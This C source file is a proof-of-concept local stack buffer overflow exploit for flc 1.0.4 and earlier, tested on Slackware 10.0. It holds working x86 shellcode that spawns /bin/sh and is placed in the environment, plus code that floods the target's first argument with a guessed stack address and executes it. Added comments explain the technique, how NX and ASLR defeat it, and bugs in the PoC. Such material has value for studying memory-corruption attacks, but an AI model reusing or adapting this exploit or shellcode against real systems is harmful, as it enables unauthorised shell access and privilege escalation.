/* flc <= 1.0.4 local stack buffer overflow exploit
   (Proof of Concept)

   Tested on Slackware 10.0

   by CoKi <coki@nosystem.com.ar>
   No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <strings.h>

#define BUFFER 25632 + 1

/* Payload handed to the target through its environment (see env[] in main).
   Per the instruction comments below it builds "/bin//sh" on the stack and
   issues syscall 0xb (execve) via int $0x80, so it is 32-bit x86 Linux only.
   It contains no 0x00 byte, which matters because it travels as a C string.
   A non-executable stack (NX) prevents this buffer from ever running. */
char shellcode[]=
	"\x31\xc0"                         /* xor %eax,%eax    */
	"\x31\xd2"                         /* xor %edx,%edx    */
	"\x52"                             /* push %edx        */
	"\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */
	"\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */
	"\x89\xe3"                         /* movl %esp,%ebx   */
	"\x52"                             /* push %edx        */
	"\x53"                             /* push %ebx        */
	"\x89\xe1"                         /* movl %esp,%ecx   */
	"\xb0\x0b"                         /* mov $0xb,%al     */
	"\xcd\x80";                        /* int $0x80        */

/* Builds an oversized argv[1] made entirely of one guessed stack address and
   execs the target binary given on the command line with it.  The technique
   relies on a fixed, predictable stack layout (no ASLR) and an executable
   stack (no NX); either mitigation breaks the address guess or the payload.
   Returns: only on a failed execle, and then without a diagnostic. */
int main(int argc, char *argv[]) {

	/* The payload is the only environment variable of the new process,
	   so on a pre-ASLR 32-bit Linux it lands at a predictable address just
	   below the top of the stack.  env[2] is never set; execle stops at
	   the first NULL, so it is unused. */
	char *env[3] = {shellcode, NULL};
	/* BUFFER is an unparenthesized macro (25632 + 1).  Harmless here, since
	   it is only used as an array size and a loop bound. */
	char buf[BUFFER], *path;
	/* buf is filled four bytes at a time through an int pointer; this
	   assumes a 32-bit int and only makes sense for a 32-bit target. */
	int *buffer = (int *) (buf);
	int i, ret;

	if(argc != 2) {
		printf(" use: %s <path>\n", argv[0]);
		/* exit() is called without <stdlib.h>: implicit declaration. */
		exit(0);
	}

	path = argv[1];

	/* Guessed return address: the classic 32-bit Linux stack top
	   (0xbffffffa) minus the lengths of the payload and of the program
	   path, i.e. the strings execve places highest on the new stack.
	   strlen is used without <string.h> (<strings.h> does not declare it),
	   so it is implicitly declared as returning int.  The subtraction is
	   done in the unsigned type of strlen and converted to int; on the
	   32-bit target this yields the intended 0xbfxxxxxx value. */
	ret = 0xbffffffa - strlen(shellcode) - strlen(path);

	/* Fill the argument with copies of the guessed address.  Two defects
	   in this PoC itself: i runs 0..25632 in steps of 4, so the final
	   store at offset 25632 writes 4 bytes into a 25633-byte array
	   (3 bytes past its end); and buf is never NUL-terminated, so unless
	   one byte of ret happens to be zero, execle reads beyond the array
	   until it finds a zero byte. */
	for(i=0; i<=BUFFER; i+=4)
	*buffer++ = ret;

	printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n");
	printf(" by CoKi <coki@nosystem.com.ar>\n\n");

	/* Run the target as "flc <buf>" with the payload as its environment.
	   Presumably the target copies its first argument into a fixed-size
	   stack buffer (not visible here).  execle is used without
	   <unistd.h>, and its return value is not checked: if the path is
	   wrong the program falls off the end of main silently. */
	execle(path, "flc", buf, NULL, env);
}

